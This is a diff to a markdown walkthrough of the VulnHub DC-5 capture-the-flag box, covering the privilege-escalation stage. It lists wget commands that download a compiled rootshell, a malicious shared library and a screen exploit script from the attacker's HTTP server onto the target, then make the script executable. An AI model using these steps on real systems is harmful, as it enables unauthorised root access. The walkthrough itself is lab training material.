leegengyu/vulnhub-box-walkthrough/dc-5.md

 ![](/screenshots/dc-5/rootshellCompilation.jpg)
 * We will name our script `screenroot.sh`, although you can name it otherwise.
 This name is the file name of the original exploit script.
 ![](/screenshots/dc-5/screenRootScriptModified.jpg)
-* Time to upload all 3 files to the vulnerable web server:
+* Ensure that our SimpleHTTPServer is still running, and upload all 3 files to the vulnerable web server:
 1. `wget http://10.0.2.15:4567/libhax.so`
 2. `wget http://10.0.2.15:4567/rootshell`
 3. `wget http://10.0.2.15:4567/screenroot.sh`
 ![](/screenshots/dc-5/uploadExploitFiles.jpg)
-* The status code `200 OK` tells us that the upload is successful.
 * `chmod +x screenroot.sh` to give it executable permissions:
 ![](/screenshots/dc-5/filesInTmpDirectory.jpg)
 * For some unknown reason, I am unable to run it on one of my devices.
 Apparently there is a wrong ELF class, which I am unable to diagnose: